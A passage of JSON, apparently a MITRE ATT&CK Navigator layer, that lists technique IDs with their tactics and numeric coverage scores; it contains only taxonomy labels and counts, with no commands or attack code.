[], "showSubtechniques": false }, { "techniqueID": "T1070.003", "tactic": "defense-evasion", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1543.003", "tactic": "persistence", "score": 47, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1543.003", "tactic": "privilege-escalation", "score": 47, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1584", "tactic": "resource-development", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { 
"techniqueID": "T1547.006", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.006", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1030", "tactic": "exfiltration", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1057", "tactic": "discovery", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1562.006", "tactic": "defense-evasion", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1499", "tactic": "impact", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.001", "tactic": "persistence", "score": 91, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.001", "tactic": "privilege-escalation", "score": 91, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.001", "tactic": "defense-evasion", "score": 91, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1106", "tactic": "execution", "score": 14, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1543.002", "tactic": "persistence", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1543.002", "tactic": "privilege-escalation", "score": 2, "color": "", "comment": "", "enabled": 
true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.004", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.004", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1036.003", "tactic": "defense-evasion", "score": 27, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1027.003", "tactic": "defense-evasion", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1552.003", "tactic": "credential-access", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1564.001", "tactic": "defense-evasion", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1040", "tactic": "credential-access", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1040", "tactic": "discovery", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1113", "tactic": "collection", "score": 10, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1027.001", "tactic": "defense-evasion", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1560.001", "tactic": "collection", "score": 16, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1212", 
"tactic": "credential-access", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1588.001", "tactic": "resource-development", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1204", "tactic": "execution", "score": 10, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1558", "tactic": "credential-access", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1003.001", "tactic": "credential-access", "score": 78, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1003.002", "tactic": "credential-access", "score": 26, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1588", "tactic": "resource-development", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1505.001", "tactic": "persistence", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1021.003", "tactic": "lateral-movement", "score": 13, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1047", "tactic": "execution", "score": 50, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1087", "tactic": "discovery", "score": 16, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1053", "tactic": "execution", "score": 12, "color": "", "comment": "", "enabled": true, "metadata": 
[], "links": [], "showSubtechniques": false }, { "techniqueID": "T1053", "tactic": "persistence", "score": 12, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1053", "tactic": "privilege-escalation", "score": 12, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1569.002", "tactic": "execution", "score": 43, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1112", "tactic": "defense-evasion", "score": 95, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1112", "tactic": "persistence", "score": 95, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1213", "tactic": "collection", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1021", "tactic": "lateral-movement", "score": 10, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1498", "tactic": "impact", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1041", "tactic": "exfiltration", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1213.003", "tactic": "collection", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1195.001", "tactic": "initial-access", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1567.001", "tactic": "exfiltration", "score": 2, "color": "", 
"comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1609", "tactic": "execution", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1611", "tactic": "privilege-escalation", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1036.005", "tactic": "defense-evasion", "score": 18, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1069.003", "tactic": "discovery", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1021.004", "tactic": "lateral-movement", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1586", "tactic": "resource-development", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1591.004", "tactic": "reconnaissance", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1003.004", "tactic": "credential-access", "score": 11, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1003.003", "tactic": "credential-access", "score": 23, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1048", "tactic": "exfiltration", "score": 11, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1021.002", "tactic": "lateral-movement", "score": 37, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": 
false }, { "techniqueID": "T1557.001", "tactic": "credential-access", "score": 10, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1557.001", "tactic": "collection", "score": 10, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1187", "tactic": "credential-access", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1021.001", "tactic": "lateral-movement", "score": 15, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1095", "tactic": "command-and-control", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.004", "tactic": "persistence", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1547.004", "tactic": "privilege-escalation", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1558.003", "tactic": "credential-access", "score": 17, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1595.002", "tactic": "reconnaissance", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1071.004", "tactic": "command-and-control", "score": 17, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1102.002", "tactic": "command-and-control", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1495", "tactic": "impact", "score": 
1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1505", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1565.002", "tactic": "impact", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1552.004", "tactic": "credential-access", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1561.001", "tactic": "impact", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1561.002", "tactic": "impact", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1124", "tactic": "discovery", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1557", "tactic": "credential-access", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1557", "tactic": "collection", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1037.005", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1037.005", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.014", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { 
"techniqueID": "T1546.014", "tactic": "persistence", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078.003", "tactic": "defense-evasion", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078.003", "tactic": "persistence", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078.003", "tactic": "privilege-escalation", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078.003", "tactic": "initial-access", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1569.001", "tactic": "execution", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1543.001", "tactic": "persistence", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1543.001", "tactic": "privilege-escalation", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1543.004", "tactic": "persistence", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1543.004", "tactic": "privilege-escalation", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1218", "tactic": "defense-evasion", "score": 152, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1564.004", "tactic": "defense-evasion", "score": 23, "color": "", 
"comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1189", "tactic": "initial-access", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1564.002", "tactic": "defense-evasion", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1555.001", "tactic": "credential-access", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1497.001", "tactic": "defense-evasion", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1497.001", "tactic": "discovery", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1566.001", "tactic": "initial-access", "score": 23, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1059.002", "tactic": "execution", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1056.002", "tactic": "collection", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1056.002", "tactic": "credential-access", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078.001", "tactic": "defense-evasion", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078.001", "tactic": "persistence", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { 
"techniqueID": "T1078.001", "tactic": "privilege-escalation", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1078.001", "tactic": "initial-access", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1036.006", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1137.002", "tactic": "persistence", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1204.002", "tactic": "execution", "score": 36, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1553", "tactic": "defense-evasion", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1059.007", "tactic": "execution", "score": 22, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1071", "tactic": "command-and-control", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1553.001", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1586.003", "tactic": "resource-development", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1590", "tactic": "reconnaissance", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1197", "tactic": "defense-evasion", "score": 16, "color": "", 
"comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1197", "tactic": "persistence", "score": 16, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1102.001", "tactic": "command-and-control", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1102.003", "tactic": "command-and-control", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1568", "tactic": "command-and-control", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1595", "tactic": "reconnaissance", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1567.002", "tactic": "exfiltration", "score": 13, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1056", "tactic": "collection", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1056", "tactic": "credential-access", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1221", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1499.004", "tactic": "impact", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1210", "tactic": "lateral-movement", "score": 15, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { 
"techniqueID": "T1127", "tactic": "defense-evasion", "score": 20, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1055.001", "tactic": "defense-evasion", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1055.001", "tactic": "privilege-escalation", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1218.011", "tactic": "defense-evasion", "score": 43, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1055", "tactic": "defense-evasion", "score": 33, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1055", "tactic": "privilege-escalation", "score": 33, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1055.003", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1055.003", "tactic": "privilege-escalation", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1055.012", "tactic": "defense-evasion", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1055.012", "tactic": "privilege-escalation", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1059.005", "tactic": "execution", "score": 26, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1218.005", "tactic": "defense-evasion", "score": 
8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1555.005", "tactic": "credential-access", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1195.002", "tactic": "initial-access", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1482", "tactic": "discovery", "score": 17, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1090.003", "tactic": "command-and-control", "score": 3, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1559.001", "tactic": "execution", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1218.010", "tactic": "defense-evasion", "score": 19, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1003.005", "tactic": "credential-access", "score": 8, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1134.001", "tactic": "defense-evasion", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1134.001", "tactic": "privilege-escalation", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.003", "tactic": "privilege-escalation", "score": 12, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.003", "tactic": "persistence", "score": 12, "color": "", "comment": "", "enabled": true, "metadata": [], "links": 
[], "showSubtechniques": false }, { "techniqueID": "T1550.003", "tactic": "defense-evasion", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1550.003", "tactic": "lateral-movement", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1218.003", "tactic": "defense-evasion", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1127.001", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1218.009", "tactic": "defense-evasion", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1021.006", "tactic": "lateral-movement", "score": 11, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1090.002", "tactic": "command-and-control", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1562.002", "tactic": "defense-evasion", "score": 26, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1055.011", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1055.011", "tactic": "privilege-escalation", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1548.002", "tactic": "privilege-escalation", "score": 56, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": 
"T1548.002", "tactic": "defense-evasion", "score": 56, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1543", "tactic": "persistence", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1543", "tactic": "privilege-escalation", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1599.001", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1218.014", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1220", "tactic": "defense-evasion", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.007", "tactic": "persistence", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.007", "tactic": "privilege-escalation", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.007", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1027.002", "tactic": "defense-evasion", "score": 1, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1202", "tactic": "defense-evasion", "score": 39, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1129", "tactic": "execution", "score": 2, "color": "", "comment": "", "enabled": 
true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1518", "tactic": "discovery", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1588.002", "tactic": "resource-development", "score": 9, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1070.001", "tactic": "defense-evasion", "score": 7, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1218.001", "tactic": "defense-evasion", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.002", "tactic": "privilege-escalation", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.002", "tactic": "persistence", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1587.001", "tactic": "resource-development", "score": 11, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1074.001", "tactic": "collection", "score": 4, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1027.004", "tactic": "defense-evasion", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.011", "tactic": "persistence", "score": 11, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.011", "tactic": "privilege-escalation", "score": 11, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { 
"techniqueID": "T1574.011", "tactic": "defense-evasion", "score": 11, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1012", "tactic": "discovery", "score": 14, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.008", "tactic": "persistence", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.008", "tactic": "privilege-escalation", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1574.008", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1027.009", "tactic": "defense-evasion", "score": 2, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1087.002", "tactic": "discovery", "score": 21, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1090.001", "tactic": "command-and-control", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1216", "tactic": "defense-evasion", "score": 13, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1615", "tactic": "discovery", "score": 5, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.011", "tactic": "privilege-escalation", "score": 6, "color": "", "comment": "", "enabled": true, "metadata": [], "links": [], "showSubtechniques": false }, { "techniqueID": "T1546.011", "tactic": "persistence", "score": 6, "color": "", "comment": 
